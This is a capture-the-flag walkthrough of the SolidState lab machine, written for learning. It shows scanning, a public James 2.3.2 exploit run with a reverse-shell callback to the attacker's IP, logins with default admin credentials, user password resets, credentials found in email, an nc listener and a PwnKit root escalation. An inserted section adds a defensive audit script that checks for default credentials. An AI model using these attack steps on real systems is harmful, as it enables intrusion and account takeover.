Ping
ping 10.10.10.51

Nmap default Scan
nmap 10.10.10.51 -oN dnmap

Nmap Script and Service Scan
nmap 10.10.10.51 -sV -sC -A -oN snmap

Nmap All Port Scan
nmap 10.10.10.51 -p- --open -T5 -oN anmap
We found one extra port
Service enumeration on new port
nmap 10.10.10.51 -sV -sC -p4555

On port 80

Will search for a public exploit for James server version 2.3.2
We got some
Will use the one from Exploit-DB: https://www.exploit-db.com/exploits/50347
I have saved the python script in a file named exp.py as always
Will run the exploit
python3 exp.py 10.10.10.51 10.10.14.6 4444

So now we have to wait for someone to log in via SSH to trigger our payload
Or we can try another way in: the administrator tool on port 4555
telnet 10.10.10.51 4555
Used the default creds root:root
So we are admin now, will explore the session
HELP
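
As an added example (not part of this writeup), here is a Python audit check an admin can run against their own James remote-administration console to confirm it no longer accepts the default root:root pair seen above. It assumes the console's prompts are line-terminated as in the telnet session, and it ships with a constructed in-process stand-in for the console so it runs offline.

```python
# Added audit example; fake_james_console is a constructed stand-in, not James.
import socket
import threading

# The pair the writeup found accepted on port 4555 (James ships with it).
DEFAULT_CREDS = [("root", "root")]

def admin_login_accepted(sock, user, password):
    """One login attempt over an open socket: answer the 'Login id:' and
    'Password:' prompts and return (accepted, server_reply)."""
    f = sock.makefile("rwb", buffering=0)
    for _ in range(3):
        f.readline()  # banner, "Please enter your login and password", "Login id:"
    f.write(user.encode() + b"\n")
    f.readline()  # "Password:" (assumed line-terminated, like the prompts above)
    f.write(password.encode() + b"\n")
    reply = f.readline().decode(errors="replace").strip()
    return reply.startswith("Welcome " + user), reply

def check_default_creds(connect, creds=DEFAULT_CREDS):
    """Return default pairs accepted; connect() returns a fresh connected socket."""
    findings = []
    for user, password in creds:
        with connect() as s:
            accepted, _ = admin_login_accepted(s, user, password)
        if accepted:
            findings.append((user, password))
    return findings

def fake_james_console(server_sock, accepted):
    """Constructed stand-in for the console, for offline demonstration only."""
    f = server_sock.makefile("rwb", buffering=0)
    f.write(b"JAMES Remote Administration Tool 2.3.2\r\n"
            b"Please enter your login and password\r\nLogin id:\r\n")
    user = f.readline().strip().decode()
    f.write(b"Password:\r\n")
    password = f.readline().strip().decode()
    if (user, password) in accepted:
        f.write(b"Welcome %s. HELP for a list of commands\r\n" % user.encode())
    else:
        f.write(b"Login failed for %s\r\n" % user.encode())
    server_sock.close()

def demo(accepted=frozenset(DEFAULT_CREDS)):
    """Run the audit against the in-process fake console; returns findings."""
    def connect():
        client, server = socket.socketpair()
        threading.Thread(target=fake_james_console, args=(server, accepted), daemon=True).start()
        return client
    return check_default_creds(connect)
```

Against a real console, pass `lambda: socket.create_connection((host, 4555), timeout=5)` as `connect`; a non-empty result means the default pair still works and the password must be changed.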

Will list the users
listusers

Will change the password of any user of our choice; I'm going to change john's password
setpassword john Password1!

Will try the new password from pop3
telnet 10.10.10.51 110
USER john
PASS Password1!
Great, we changed john's password successfully…!
John has no emails, so will change passwords for other users and look for mails.
Eventually, mindy has mail
LIST

Will read the content
RETR 1
RETR 2

We got SSH creds in the 2nd email
mindy:P@55W0rd1!2@
Will ssh now
ssh mindy@10.10.10.51
Now will check on our reverse shell
rlwrap nc -nvlp 4444
Nice…!
user.txt

Now will jump to privilege escalation…!
After a long enumeration there seemed to be no way to escalate my privileges
But there is one, PwnKit it is…!
I can see pkexec has the SUID bit set, so I checked the pkexec version and it is a vulnerable one
find / -perm -u=s -type f 2>/dev/null
pkexec --version

It is a 32-bit system, so I transferred Pwnkit32 to the target machine and ran it
chmod +x Pwnkit32
./Pwnkit32
wE aR3 R0ot…!
root.txt

Done with Solidstate…:)